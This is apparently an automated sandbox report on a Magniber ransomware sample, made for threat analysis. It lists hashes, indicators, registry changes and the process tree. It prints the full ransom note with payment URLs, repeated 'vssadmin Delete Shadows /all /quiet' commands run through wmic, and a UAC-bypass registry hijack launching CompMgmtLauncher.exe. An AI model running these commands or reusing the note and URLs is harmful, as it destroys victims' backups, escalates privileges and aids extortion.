magniber | 92b8d14c0b35823e25773eb324720dfe3a285d533f5a59f93f8136280acd0e0e

Analysis

max time kernel
121s
max time network
148s
platform
windows7_x64
resource
win7-en-20210920
submitted
01/11/2021, 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jrbgmq.inf.dll
Size

38KB
MD5

0aea8bca4799f7a2e44d4be293787d9a
SHA1

a957236b7c257c2bc604bb3f2b6c294b2f34691f
SHA256

92b8d14c0b35823e25773eb324720dfe3a285d533f5a59f93f8136280acd0e0e
SHA512

49f1264b3e949d4592fe55f1f2661b58d1884a78c73c22cf3883c7448455004cc4445b548f5203cca6a6927f2c008865bb82575b37554a7c0c031ad3b2e5a91e

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2cd450407ef4da804erdrejjurq.3vygk5flyo5rn37gyezm5s2e57lq6e34tgr6nrhsatiuskwo3kwepiid.onion/rdrejjurq Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2cd450407ef4da804erdrejjurq.bankhid.space/rdrejjurq http://2cd450407ef4da804erdrejjurq.letsyou.uno/rdrejjurq http://2cd450407ef4da804erdrejjurq.bookrow.website/rdrejjurq http://2cd450407ef4da804erdrejjurq.twosat.fit/rdrejjurq Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://2cd450407ef4da804erdrejjurq.3vygk5flyo5rn37gyezm5s2e57lq6e34tgr6nrhsatiuskwo3kwepiid.onion/rdrejjurq

http://2cd450407ef4da804erdrejjurq.bankhid.space/rdrejjurq

http://2cd450407ef4da804erdrejjurq.letsyou.uno/rdrejjurq

http://2cd450407ef4da804erdrejjurq.bookrow.website/rdrejjurq

http://2cd450407ef4da804erdrejjurq.twosat.fit/rdrejjurq

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	1824	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	600	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	600	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1356	1824	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1908	1824	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	968	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1572	1824	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1668	1824	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	1824	vssadmin.exe	37

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\RestoreRevoke.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\CompletePush.raw => C:\Users\Admin\Pictures\CompletePush.raw.rdrejjurq	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ConnectBlock.crw => C:\Users\Admin\Pictures\ConnectBlock.crw.rdrejjurq	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\BlockSync.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\BlockSync.tiff => C:\Users\Admin\Pictures\BlockSync.tiff.rdrejjurq	rundll32.exe
File renamed	C:\Users\Admin\Pictures\RequestSubmit.png => C:\Users\Admin\Pictures\RequestSubmit.png.rdrejjurq	rundll32.exe
File renamed	C:\Users\Admin\Pictures\RestoreRevoke.tiff => C:\Users\Admin\Pictures\RestoreRevoke.tiff.rdrejjurq	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\AddGroup.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\AddGroup.tiff => C:\Users\Admin\Pictures\AddGroup.tiff.rdrejjurq	rundll32.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1876 set thread context of 1132	1876	rundll32.exe	14
PID 1876 set thread context of 1220	1876	rundll32.exe	22
PID 1876 set thread context of 1272	1876	rundll32.exe	20

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1748	vssadmin.exe
968	vssadmin.exe
1668	vssadmin.exe
1604	vssadmin.exe
600	vssadmin.exe
1120	vssadmin.exe
600	vssadmin.exe
580	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000689b458560e3020c016766bc4ea1be5edac3879874421064e487ae9672d1c0e5000000000e8000000002000020000000474c260ea6cf1492ed8d3e373aaf8f92b3376e6bc8ce7400bf611f0b1c621396900000000e1c76724d5fa042db2ef8853173a512858c0cf78150d181d959406708ed498888dc2866d036bfdf41eb6fc3b03fd1f33c31ec347d96ac75a97f69f9fda74da2de2c8273d13f4bb84d2675e11a51be80566940b9348999913f74ad4a729320ba2867388906459a8b973f8f6bfcdf361d92f05c860ca1d065280eb692f409c91e69115dc3b07edb235fd819caf08337e8400000002a128bf9a8c27561552666a1b03e9f97d567dc2b30e3b639ea426e7be1151d5c48fa679e2386019a579c611d43f17c4485be0a686b81b341a375ac56546cecdc	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000a5cd1f6c900478e97b6725ef453b27621a3fe7e691dc9fbc0d3a5d931fa47707000000000e80000000020000200000003ab297fad8bea8fa7623e573eb5568ee5759b364a6d0ff5dbf1d683dfe20be7f2000000021d342931605bb6e06f7a8376feb94d5756f5c14e3df9326c4c288b743c2da4e40000000ffb5a7436e384fde1d2824a97c2246c890d865976863f1dc36a12d6877459192300b24dcfb0ed2cf60e99873a8d8ec4df577c1f73a9fe6802d843180dc1d7a3e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d022eff4eeced701	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1C6C3E31-3AE2-11EC-B2E0-EE548F012901} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "342515312"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1196	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1876	rundll32.exe
1876	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1272	Explorer.EXE

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1876	rundll32.exe
1876	rundll32.exe
1876	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2004	wmic.exe
Token: SeSecurityPrivilege	2004	wmic.exe
Token: SeTakeOwnershipPrivilege	2004	wmic.exe
Token: SeLoadDriverPrivilege	2004	wmic.exe
Token: SeSystemProfilePrivilege	2004	wmic.exe
Token: SeSystemtimePrivilege	2004	wmic.exe
Token: SeProfSingleProcessPrivilege	2004	wmic.exe
Token: SeIncBasePriorityPrivilege	2004	wmic.exe
Token: SeCreatePagefilePrivilege	2004	wmic.exe
Token: SeBackupPrivilege	2004	wmic.exe
Token: SeRestorePrivilege	2004	wmic.exe
Token: SeShutdownPrivilege	2004	wmic.exe
Token: SeDebugPrivilege	2004	wmic.exe
Token: SeSystemEnvironmentPrivilege	2004	wmic.exe
Token: SeRemoteShutdownPrivilege	2004	wmic.exe
Token: SeUndockPrivilege	2004	wmic.exe
Token: SeManageVolumePrivilege	2004	wmic.exe
Token: 33	2004	wmic.exe
Token: 34	2004	wmic.exe
Token: 35	2004	wmic.exe
Token: SeIncreaseQuotaPrivilege	964	WMIC.exe
Token: SeSecurityPrivilege	964	WMIC.exe
Token: SeTakeOwnershipPrivilege	964	WMIC.exe
Token: SeLoadDriverPrivilege	964	WMIC.exe
Token: SeSystemProfilePrivilege	964	WMIC.exe
Token: SeSystemtimePrivilege	964	WMIC.exe
Token: SeProfSingleProcessPrivilege	964	WMIC.exe
Token: SeIncBasePriorityPrivilege	964	WMIC.exe
Token: SeCreatePagefilePrivilege	964	WMIC.exe
Token: SeBackupPrivilege	964	WMIC.exe
Token: SeRestorePrivilege	964	WMIC.exe
Token: SeShutdownPrivilege	964	WMIC.exe
Token: SeDebugPrivilege	964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	964	WMIC.exe
Token: SeRemoteShutdownPrivilege	964	WMIC.exe
Token: SeUndockPrivilege	964	WMIC.exe
Token: SeManageVolumePrivilege	964	WMIC.exe
Token: 33	964	WMIC.exe
Token: 34	964	WMIC.exe
Token: 35	964	WMIC.exe
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2004	wmic.exe
Token: SeSecurityPrivilege	2004	wmic.exe
Token: SeTakeOwnershipPrivilege	2004	wmic.exe
Token: SeLoadDriverPrivilege	2004	wmic.exe
Token: SeSystemProfilePrivilege	2004	wmic.exe
Token: SeSystemtimePrivilege	2004	wmic.exe
Token: SeProfSingleProcessPrivilege	2004	wmic.exe
Token: SeIncBasePriorityPrivilege	2004	wmic.exe
Token: SeCreatePagefilePrivilege	2004	wmic.exe
Token: SeBackupPrivilege	2004	wmic.exe
Token: SeRestorePrivilege	2004	wmic.exe
Token: SeShutdownPrivilege	2004	wmic.exe
Token: SeDebugPrivilege	2004	wmic.exe
Token: SeSystemEnvironmentPrivilege	2004	wmic.exe
Token: SeRemoteShutdownPrivilege	2004	wmic.exe
Token: SeUndockPrivilege	2004	wmic.exe
Token: SeManageVolumePrivilege	2004	wmic.exe
Token: 33	2004	wmic.exe
Token: 34	2004	wmic.exe
Token: 35	2004	wmic.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1740	iexplore.exe
1272	Explorer.EXE
1272	Explorer.EXE

Suspicious use of SendNotifyMessage 54 IoCs

pid	Process
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1740	iexplore.exe
1740	iexplore.exe
1900	IEXPLORE.EXE
1900	IEXPLORE.EXE
1900	IEXPLORE.EXE
1900	IEXPLORE.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
1272	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1876 wrote to memory of 1196	1876	rundll32.exe	28
PID 1876 wrote to memory of 1196	1876	rundll32.exe	28
PID 1876 wrote to memory of 1196	1876	rundll32.exe	28
PID 1876 wrote to memory of 1496	1876	rundll32.exe	29
PID 1876 wrote to memory of 1496	1876	rundll32.exe	29
PID 1876 wrote to memory of 1496	1876	rundll32.exe	29
PID 1876 wrote to memory of 2004	1876	rundll32.exe	30
PID 1876 wrote to memory of 2004	1876	rundll32.exe	30
PID 1876 wrote to memory of 2004	1876	rundll32.exe	30
PID 1876 wrote to memory of 1408	1876	rundll32.exe	31
PID 1876 wrote to memory of 1408	1876	rundll32.exe	31
PID 1876 wrote to memory of 1408	1876	rundll32.exe	31
PID 1408 wrote to memory of 964	1408	cmd.exe	35
PID 1408 wrote to memory of 964	1408	cmd.exe	35
PID 1408 wrote to memory of 964	1408	cmd.exe	35
PID 1496 wrote to memory of 1740	1496	cmd.exe	36
PID 1496 wrote to memory of 1740	1496	cmd.exe	36
PID 1496 wrote to memory of 1740	1496	cmd.exe	36
PID 2012 wrote to memory of 1624	2012	cmd.exe	42
PID 2012 wrote to memory of 1624	2012	cmd.exe	42
PID 2012 wrote to memory of 1624	2012	cmd.exe	42
PID 1740 wrote to memory of 1900	1740	iexplore.exe	47
PID 1740 wrote to memory of 1900	1740	iexplore.exe	47
PID 1740 wrote to memory of 1900	1740	iexplore.exe	47
PID 1740 wrote to memory of 1900	1740	iexplore.exe	47
PID 1624 wrote to memory of 964	1624	CompMgmtLauncher.exe	48
PID 1624 wrote to memory of 964	1624	CompMgmtLauncher.exe	48
PID 1624 wrote to memory of 964	1624	CompMgmtLauncher.exe	48
PID 1272 wrote to memory of 800	1272	Explorer.EXE	53
PID 1272 wrote to memory of 800	1272	Explorer.EXE	53
PID 1272 wrote to memory of 800	1272	Explorer.EXE	53
PID 1272 wrote to memory of 896	1272	Explorer.EXE	54
PID 1272 wrote to memory of 896	1272	Explorer.EXE	54
PID 1272 wrote to memory of 896	1272	Explorer.EXE	54
PID 896 wrote to memory of 216	896	cmd.exe	57
PID 896 wrote to memory of 216	896	cmd.exe	57
PID 896 wrote to memory of 216	896	cmd.exe	57
PID 1356 wrote to memory of 1668	1356	cmd.exe	62
PID 1356 wrote to memory of 1668	1356	cmd.exe	62
PID 1356 wrote to memory of 1668	1356	cmd.exe	62
PID 1668 wrote to memory of 204	1668	CompMgmtLauncher.exe	63
PID 1668 wrote to memory of 204	1668	CompMgmtLauncher.exe	63
PID 1668 wrote to memory of 204	1668	CompMgmtLauncher.exe	63
PID 1220 wrote to memory of 1556	1220	Dwm.exe	67
PID 1220 wrote to memory of 1556	1220	Dwm.exe	67
PID 1220 wrote to memory of 1556	1220	Dwm.exe	67
PID 1220 wrote to memory of 1332	1220	Dwm.exe	68
PID 1220 wrote to memory of 1332	1220	Dwm.exe	68
PID 1220 wrote to memory of 1332	1220	Dwm.exe	68
PID 1332 wrote to memory of 968	1332	cmd.exe	71
PID 1332 wrote to memory of 968	1332	cmd.exe	71
PID 1332 wrote to memory of 968	1332	cmd.exe	71
PID 1908 wrote to memory of 220	1908	cmd.exe	76
PID 1908 wrote to memory of 220	1908	cmd.exe	76
PID 1908 wrote to memory of 220	1908	cmd.exe	76
PID 220 wrote to memory of 600	220	CompMgmtLauncher.exe	77
PID 220 wrote to memory of 600	220	CompMgmtLauncher.exe	77
PID 220 wrote to memory of 600	220	CompMgmtLauncher.exe	77
PID 1132 wrote to memory of 1356	1132	taskhost.exe	81
PID 1132 wrote to memory of 1356	1132	taskhost.exe	81
PID 1132 wrote to memory of 1356	1132	taskhost.exe	81
PID 1132 wrote to memory of 576	1132	taskhost.exe	83
PID 1132 wrote to memory of 576	1132	taskhost.exe	83
PID 1132 wrote to memory of 576	1132	taskhost.exe	83

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1132
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1356
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:576
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1604

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\jrbgmq.inf.dll,#1
  2⤵
  - Modifies extensions of user files
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1876
- - C:\Windows\system32\notepad.exe
    notepad.exe C:\Users\Public\readme.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:1196
- - C:\Windows\system32\cmd.exe
    cmd /c "start http://2cd450407ef4da804erdrejjurq.bankhid.space/rdrejjurq^&1^&44037963^&76^&367^&12"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://2cd450407ef4da804erdrejjurq.bankhid.space/rdrejjurq&1&44037963&76&367&12
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1740 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1900
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:964
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:800
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:896
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:216

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1220
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1556
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1332
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:968

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:964

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:600

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:832

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1120

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:600

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1668
